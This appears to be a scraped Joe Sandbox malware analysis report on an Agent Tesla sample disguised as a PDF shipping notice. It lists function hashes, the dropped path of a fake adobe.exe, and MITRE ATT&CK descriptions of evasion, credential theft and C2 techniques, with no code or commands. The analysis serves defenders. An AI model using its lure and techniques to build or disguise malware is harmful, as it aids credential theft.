Function 06A8A27B Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 908fa99f7b59e954a939edb1af982154510ab3efcdc320065aa56ab2ee420e00
Instruction ID: 4426739faba7ba70196e756ffb4716edac0f2730399989d3173b00aa42b5bf8a
Opcode Fuzzy Hash: 908fa99f7b59e954a939edb1af982154510ab3efcdc320065aa56ab2ee420e00
Instruction Fuzzy Hash: 4C018434B105154FDB60BAADD45571A77D5E78A710F14893AE60ADF350EE26EC028780

Function 06A83F67 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 868fe6b685ec9153f0f2b479630f5ca85f71ee4db4552db666de762014fb4260
Instruction ID: 4a2182064dc8c2499daa587fbe6bf2044171ea1a4190be687b119c8ed66fd130
Opcode Fuzzy Hash: 868fe6b685ec9153f0f2b479630f5ca85f71ee4db4552db666de762014fb4260
Instruction Fuzzy Hash: 9001D432B100658FDF94A6A8D814AAF77FAEFC8611F044139D807EB248EE258C029BD1

Function 06A8F128 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38e556017c9f05276168ca77d2b74ea593502a80a7bb26d8c60a490912112925
Instruction ID: e88ba66c96485abe815ac4d473c94527a3f1a46c56b9db1183b9275411983221
Opcode Fuzzy Hash: 38e556017c9f05276168ca77d2b74ea593502a80a7bb26d8c60a490912112925
Instruction Fuzzy Hash: 32018175B100120FDB65B6BDD86472E77D6E7C9750F64883AE20ACB340DE66DC038395

Function 06A8A288 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a80c1f0ebbb7d7cf2a66e5b011512e58ee37bf820b125cf74a8a8bb710f7667d
Instruction ID: c39436ac4943dfb2a5f80d8ee205ba040c45c324bbeae3dc71d69707688d1a49
Opcode Fuzzy Hash: a80c1f0ebbb7d7cf2a66e5b011512e58ee37bf820b125cf74a8a8bb710f7667d
Instruction Fuzzy Hash: DF018134B105254FDB75BBADD460B1EB7D6EB89710F10897AE60ADB354EE26EC028780

Function 06A8C758 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0ed3b27bd9ef789f83a938e85dd97b917612d8a0c4078b279f79eaabebd94b3
Instruction ID: 48e253c4be1aad0ab85649cee3b251aceb75a7335d8bea84b1507ee54cbc391a
Opcode Fuzzy Hash: b0ed3b27bd9ef789f83a938e85dd97b917612d8a0c4078b279f79eaabebd94b3
Instruction Fuzzy Hash: 5EF0A736E202289BDF14B666D800A9AB33AE784764F104565E901A7344D731A801CBE0

Function 06A863E0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7fb1257b7073bfe1c6828753ed7a450a94f7c245876c70d629cb986d1bb67f3
Instruction ID: af0f11524e69639a5a2e526755bd3006aea372a779d11794dc1d5810bf5eb550
Opcode Fuzzy Hash: f7fb1257b7073bfe1c6828753ed7a450a94f7c245876c70d629cb986d1bb67f3
Instruction Fuzzy Hash: C9E0DFB1E50208ABEF90FEB4CA8A75F77A9D742214F6084A5D845CF201E536CA03C341

Function 06A863F0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd82ae8ca65274fc3454b2c4d1ce8315d717affde06d8b7be6468b424b4745b
Instruction ID: 2ecb4ea5f908aee65a1e06fc93b177aa1a5684f5e9ab7f4ce0e9f2855e3757b1
Opcode Fuzzy Hash: 3bd82ae8ca65274fc3454b2c4d1ce8315d717affde06d8b7be6468b424b4745b
Instruction Fuzzy Hash: 46E012B1E14208AFEF90FFB4CA5575EB7ADD745214F2084B5D409DB201E676DE02C781

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Arrival Notice - BL 713410220035.PDF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Adobe\adobe.exe

C:\Users\user\AppData\Roaming\Adobe\adobe.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Windows Analysis Report
Arrival Notice - BL 713410220035.PDF.exe

Function 025EA508 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Function 025EAEF0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 025ECDD8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 025E98C8 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Function 025EA978 Relevance: 1.6, APIs: 1, Instructions: 53
libraryCOMMON

Function 025EA6F8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre